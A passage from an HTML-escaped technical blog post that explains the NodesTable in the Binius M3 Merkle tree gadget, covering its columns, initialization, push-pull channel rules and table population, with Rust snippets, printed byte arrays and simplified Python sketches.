&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        MerklePath {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            root_id: 0,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            index,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            leaf: leaves[index],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            nodes: tree.merkle_path(index),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;* ... *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This should first print the eight leaves and the root (each a 32-byte array):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;--------- Merkle tree data -------&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Leaves: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [127, 178, 123, 148, 22, 2, 208, 29, 17, 84, 34, 17, 19, 79, 199, 26, 172, 174, 84, 227, 126, 125, 0, 123, 187, 123, 85, 239, 240, 98, 162, 132], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [154, 99, 40, 60, 186, 240, 253, 188, 235, 31, 100, 121, 177, 151, 243, 168, 141, 208, 216, 9, 47, 231, 42, 124, 86, 40, 21, 56, 115, 139, 7, 226], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [114, 238, 165, 17, 148, 16, 151, 58, 227, 40, 173, 146, 145, 98, 104, 18, 142, 219, 71, 16, 110, 26, 214, 168, 195, 213, 69, 132, 155, 138, 184, 27], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [16, 24, 93, 38, 2, 59, 54, 16, 206, 183, 217, 245, 125, 73, 210, 179, 135, 99, 161, 43, 43, 189, 250, 147, 39, 90, 255, 24, 42, 251, 149, 220],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [118, 35, 234, 226, 120, 82, 64, 185, 61, 18, 177, 106, 102, 216, 22, 16, 124, 220, 140, 137, 199, 16, 143, 255, 32, 149, 225, 141, 223, 239, 137, 134], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [177, 24, 234, 85, 97, 98, 77, 166, 204, 83, 123, 174, 213, 110, 96, 47, 147, 140, 128, 78, 39, 248, 49, 150, 97, 12, 136, 40, 199, 35, 247, 152], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [80, 79, 178, 164, 68, 97, 204, 11, 235, 179, 37, 40, 14, 217, 19, 10, 89, 187, 219, 49, 28, 1, 253, 115, 73, 9, 161, 31, 158, 72, 102, 40], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [180, 59, 54, 61, 129, 174, 139, 104, 153, 70, 236, 229, 198, 130, 205, 89, 138, 101, 234, 191, 246, 58, 53, 114, 223, 228, 95, 181, 173, 229, 139, 220]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Root: [193, 178, 67, 64, 61, 105, 200, 119, 129, 200, 250, 91, 108, 49, 178, 161, 234, 142, 150, 145, 206, 128, 43, 153, 216, 191, 196, 183, 198, 179, 118, 122]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then the first Merkle path:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;------- Path data -------&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Proving leaf index: 3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Proving leaf: [16, 24, 93, 38, 2, 59, 54, 16, 206, 183, 217, 245, 125, 73, 210, 179, 135, 99, 161, 43, 43, 189, 250, 147, 39, 90, 255, 24, 42, 251, 149, 220]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Merkle tree path: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [114, 238, 165, 17, 148, 16, 151, 58, 227, 40, 173, 146, 145, 98, 104, 18, 142, 219, 71, 16, 110, 26, 214, 168, 195, 213, 69, 132, 155, 138, 184, 27], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [246, 247, 101, 36, 57, 192, 24, 48, 162, 208, 160, 30, 187, 154, 180, 176, 208, 104, 135, 216, 175, 8, 0, 249, 96, 50, 194, 72, 102, 219, 184, 27], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [70, 219, 30, 17, 251, 21, 8, 37, 23, 248, 120, 106, 49, 210, 42, 247, 15, 227, 231, 151, 101, 7, 187, 203, 29, 109, 186, 223, 43, 126, 183, 173]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And finally, the second Merkle path:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;------- Path data -------&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Proving leaf index: 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Proving leaf: [118, 35, 234, 226, 120, 82, 64, 185, 61, 18, 177, 106, 102, 216, 22, 16, 124, 220, 140, 137, 199, 16, 143, 255, 32, 149, 225, 141, 223, 239, 137, 134]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Merkle tree path: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [177, 24, 234, 85, 97, 98, 77, 166, 204, 83, 123, 174, 213, 110, 96, 47, 147, 140, 128, 78, 39, 248, 49, 150, 97, 12, 136, 40, 199, 35, 247, 152],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [44, 37, 79, 124, 156, 84, 213, 102, 239, 101, 1, 89, 211, 73, 117, 58, 143, 41, 102, 47, 67, 32, 248, 100, 29, 138, 44, 204, 232, 177, 216, 54], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [124, 166, 97, 100, 173, 242, 98, 95, 141, 158, 147, 144, 202, 239, 150, 192, 0, 99, 9, 138, 61, 19, 65, 163, 160, 4, 227, 66, 233, 115, 199, 3]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;So, our Merkle tree should look like the one below. To make the graph more readable, we only wrote the first byte of each node, even though we should have written all 32 bytes. The first path is shown in green, and the second one in blue. You may be wondering how we know the content of the middle nodes “181” and “67”, since they are neither the leaves, the root, nor part of the Merkle paths. We got that information from prints we’ll make later.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;BJe-hoFQlx.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In the remainder of this post, we’ll explain the three types of tables used in a &lt;code&gt;MerkleTreeCS&lt;&#x2F;code&gt;: &lt;strong&gt;NodesTable&lt;&#x2F;strong&gt;, &lt;strong&gt;RootTable&lt;&#x2F;strong&gt;, and &lt;strong&gt;IncrLookup&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;What are they for? How are they populated? How do they interact with the different channels? We’ll answer these questions using the tree we just built as an illustration.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;nodestable&quot;&gt;NodesTable&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;purpose&quot;&gt;Purpose&lt;&#x2F;h3&gt;
&lt;p&gt;This table type is designed to handle the relationships between parent and child nodes. Each row in the table corresponds to a &lt;code&gt;MerklePathEvent&lt;&#x2F;code&gt;, which captures the interaction between three related nodes: two children (left and right) and their parent.&lt;&#x2F;p&gt;
&lt;p&gt;When proving Merkle tree paths, the table is populated by traversing each path and creating one row for every parent-children trio encountered. This systematic approach ensures that all necessary node relationships are properly encoded and can be verified through the constraint system.&lt;&#x2F;p&gt;
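&lt;p&gt;The traversal can be sketched in a few lines of Python. This is a hypothetical model, not Binius code: SHA-256 stands in for the Groestl-256 hash used by Binius, and the row layout is simplified to (parent depth, left, right, parent):&lt;&#x2F;p&gt;

```python
# Hypothetical sketch of how one row per parent-children trio arises while
# walking a Merkle path. SHA-256 stands in for the Groestl-256 permutation
# used by Binius; all names here are illustrative, not the Binius API.
import hashlib

def hash_pair(left, right):
    return hashlib.sha256(left + right).digest()

def path_rows(leaf, index, siblings):
    """Yield one (parent_depth, left, right, parent) row per tree level."""
    rows = []
    node = leaf
    depth = len(siblings)  # leaves sit at the deepest level
    for sibling in siblings:
        if index % 2 == 0:
            left, right = node, sibling
        else:
            left, right = sibling, node
        node = hash_pair(left, right)
        depth -= 1
        rows.append((depth, left, right, node))
        index //= 2
    return rows, node  # node is now the claimed root

leaves = [bytes([i]) * 32 for i in range(8)]
# Path for leaf 3: sibling leaf 2, then the two internal siblings.
n01 = hash_pair(leaves[0], leaves[1])
n23 = hash_pair(leaves[2], leaves[3])
n45 = hash_pair(leaves[4], leaves[5])
n67 = hash_pair(leaves[6], leaves[7])
rows, root = path_rows(leaves[3], 3, [leaves[2], n01, hash_pair(n45, n67)])
print(len(rows), root == hash_pair(hash_pair(n01, n23), hash_pair(n45, n67)))
```

&lt;p&gt;For an 8-leaf tree, each path produces three rows, one per parent-children trio, and each of those rows ends up as a row in one of the &lt;code&gt;NodesTable&lt;&#x2F;code&gt; instances.&lt;&#x2F;p&gt;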
&lt;h3 id=&quot;content-and-columns&quot;&gt;Content and Columns&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L218&quot;&gt;NodesTable&lt;&#x2F;a&gt; contains a set of columns that can be categorized into three main groups:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;1. MerklePathEvent Data&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;These columns store the fundamental information about each node relationship:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;root_id&lt;&#x2F;code&gt;: Identifies which Merkle tree the three nodes belong to.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;left_columns&lt;&#x2F;code&gt;, &lt;code&gt;right_columns&lt;&#x2F;code&gt;: Store the digest values of the left and right child nodes.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;parent_depth&lt;&#x2F;code&gt;, &lt;code&gt;child_depth&lt;&#x2F;code&gt;: Indicate the tree levels where the parent and child nodes sit. The levels (or depths) start at 0 at the top (the root) and increase down to $\log_2 (\text{leaves}.\text{len()})$ at the leaves.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;parent_index&lt;&#x2F;code&gt;, &lt;code&gt;left_index&lt;&#x2F;code&gt;, &lt;code&gt;right_index_packed&lt;&#x2F;code&gt;: Store the positional indices of nodes.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;_pull_child&lt;&#x2F;code&gt;: Specifies which child node needs to be pulled from the channel.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;2. Groestl-256 Hash Computation&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;These columns handle the cryptographic hash operations:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;state_out_shifted&lt;&#x2F;code&gt;: Contains the concatenated bytes of the left and right children, organized for the Groestl-256 permutation.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;permutation_output_columns&lt;&#x2F;code&gt;: Store the bytes after the Groestl-256 output transformation.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;permutation&lt;&#x2F;code&gt;: The Groestl-256 permutation gadget.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: This serves as a clear example of the power of gadgets. In a sense, the gadget responsible for verifying a Merkle path delegates the task of checking the validity of the hash function to another gadget (not detailed in this post, but it operates in an analogous way). This modular approach allows us to build proofs for more complex programs in a clean and scalable manner.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;3. Depth Constraint&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;increment&lt;&#x2F;code&gt;: A gadget used to ensure the child node depth is exactly one more than the parent node depth.&lt;&#x2F;p&gt;
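&lt;p&gt;As a rough mental model (illustrative Python, not the Binius gadget), the increment lookup amounts to checking each claimed (parent depth, child depth) pair against a table of valid increments:&lt;&#x2F;p&gt;

```python
# Illustrative sketch (not the Binius API) of how an increment lookup can
# enforce child_depth == parent_depth + 1: every (parent_depth, child_depth)
# pair a NodesTable row claims must appear in a table of valid increments.
MAX_DEPTH = 20  # hypothetical bound, chosen only for this sketch

valid_increments = {(d, d + 1) for d in range(MAX_DEPTH)}

def depth_constraint_holds(parent_depth, child_depth):
    return (parent_depth, child_depth) in valid_increments

print(depth_constraint_holds(0, 1))  # True: children of the root sit at depth 1
print(depth_constraint_holds(1, 3))  # False: depth may only grow by one
```

&lt;p&gt;In the actual system the membership check is carried out through the &lt;code&gt;lookup_channel&lt;&#x2F;code&gt; rather than a set lookup, but the relation being enforced is the same.&lt;&#x2F;p&gt;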
&lt;h3 id=&quot;initialization-1&quot;&gt;Initialization&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;code&gt;NodesTable&lt;&#x2F;code&gt; is created through its &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L249&quot;&gt;new()&lt;&#x2F;a&gt; method. This initialization process involves:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Adding the table to the &lt;strong&gt;constraint system&lt;&#x2F;strong&gt; using &lt;code&gt;cs.add_table()&lt;&#x2F;code&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;Adding &lt;strong&gt;committed columns&lt;&#x2F;strong&gt; to the table using &lt;code&gt;table.add_committed()&lt;&#x2F;code&gt; or &lt;code&gt;table.add_committed_multiple()&lt;&#x2F;code&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;Adding &lt;strong&gt;virtual columns&lt;&#x2F;strong&gt; to the table using &lt;code&gt;table.add_packed()&lt;&#x2F;code&gt;, &lt;code&gt;table.add_shifted()&lt;&#x2F;code&gt;, and &lt;code&gt;table.add_computed()&lt;&#x2F;code&gt;. In the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.binius.xyz&#x2F;building&#x2F;pattern&#x2F;declaring&quot;&gt;Binius documentation&lt;&#x2F;a&gt; you can see an explanation of the difference between committed and virtual columns.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: This is particularly relevant in M3, as it represents one of the key differences compared to other proving systems. Virtual columns play a fundamental role by allowing the prover to commit only to a reduced number of tables (committed columns), while avoiding the need to commit to the virtual ones. The reason this is possible is that all the information required to reconstruct the virtual columns from the committed ones is fully encoded in the constraint system.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Establishing a &lt;strong&gt;zero constraint&lt;&#x2F;strong&gt; to ensure that the concatenation of the left and right child nodes equals the input of the parent hash. This is implemented using &lt;code&gt;table.assert_zero()&lt;&#x2F;code&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for i in 0..8 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    table.assert_zero(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        format!(&amp;quot;state_in_assert[{i}]&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        state_in_packed[i]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            - upcast_col(left_packed[i])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            - upcast_col(right_packed[i]) * B64::from(1 &amp;lt;&amp;lt; 32),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;ul&gt;
&lt;li&gt;Setting up &lt;strong&gt;flushing rules&lt;&#x2F;strong&gt; that define how the table interacts with the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L409&quot;&gt;NodesChannel&lt;&#x2F;a&gt; using &lt;code&gt;nodes_channel.push()&lt;&#x2F;code&gt; and &lt;code&gt;nodes_channel.pull()&lt;&#x2F;code&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;channel-interaction&quot;&gt;Channel interaction&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s take a closer look at the last point of the table initialization. The &lt;code&gt;NodesTable&lt;&#x2F;code&gt; interacts with the &lt;code&gt;NodesChannel&lt;&#x2F;code&gt; through the following push-pull rule: &lt;em&gt;Push Parent, Pull Child&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Push:&lt;&#x2F;strong&gt; Parent node information (root ID, content, depth, and index) is pushed to the channel.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Pull:&lt;&#x2F;strong&gt; Depending on the &lt;code&gt;pull_child&lt;&#x2F;code&gt; input, pull either the left child, the right child, or both children from the channel. For each path, only one child is pulled, left or right depending on the path route. But if the same parent-children trio (a Merkle event) appears in two different paths, once pulling left and once pulling right, then both children are pulled.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;table-population&quot;&gt;Table population&lt;&#x2F;h3&gt;
&lt;p&gt;The struct &lt;code&gt;NodesTable&lt;&#x2F;code&gt; implements the &lt;code&gt;TableFiller&lt;&#x2F;code&gt; trait, with the core population logic in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L508&quot;&gt;fill()&lt;&#x2F;a&gt; function. For each &lt;code&gt;MerklePathEvent&lt;&#x2F;code&gt;, the function:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Extracts the node relationship data (parent, left child, right child).&lt;&#x2F;li&gt;
&lt;li&gt;Computes derived values like child indices and depth increments.&lt;&#x2F;li&gt;
&lt;li&gt;Fills the permutation state with the concatenated child node data.&lt;&#x2F;li&gt;
&lt;li&gt;Populates all table columns with the appropriate values.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;This filling process transforms the trace data into the constraint system representation needed for proof generation and verification.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;our-example&quot;&gt;Our Example&lt;&#x2F;h3&gt;
&lt;p&gt;To understand what a &lt;code&gt;MerklePathEvent&lt;&#x2F;code&gt; is and how these tables are populated, let’s look at our example.&lt;&#x2F;p&gt;
&lt;p&gt;In the &lt;code&gt;main()&lt;&#x2F;code&gt; function of the &lt;code&gt;merkle_tree.rs&lt;&#x2F;code&gt; example, once we have the tree and the paths, the trace is generated and the tables are then filled using the function &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L100&quot;&gt;fill_tables()&lt;&#x2F;a&gt;. Here we can add some prints to see what all this data looks like.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn fill_tables(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace: &amp;amp;MerkleTreeTrace,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cs: &amp;amp;ConstraintSystem,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witness: &amp;amp;mut WitnessIndex,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; anyhow::Result&amp;lt;()&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Filter the MerklePathEvents into three iterators based on the pull child type.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let left_events = trace&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .nodes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .copied()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .filter(|event| event.flush_left &amp;amp;&amp;amp; !event.flush_right)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let right_events = trace&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .nodes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .copied()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .filter(|event| !event.flush_left &amp;amp;&amp;amp; event.flush_right)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let both_events = trace&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .nodes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .copied()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .filter(|event| event.flush_left &amp;amp;&amp;amp; event.flush_right)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;------- Merkle Path Events -------&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;Left events: {:?}&amp;quot;, &amp;amp;left_events);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;Right events: {:?}&amp;quot;, &amp;amp;right_events);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;Both events: {:?}&amp;quot;, &amp;amp;both_events);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Fill the nodes tables based on the filtered events.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
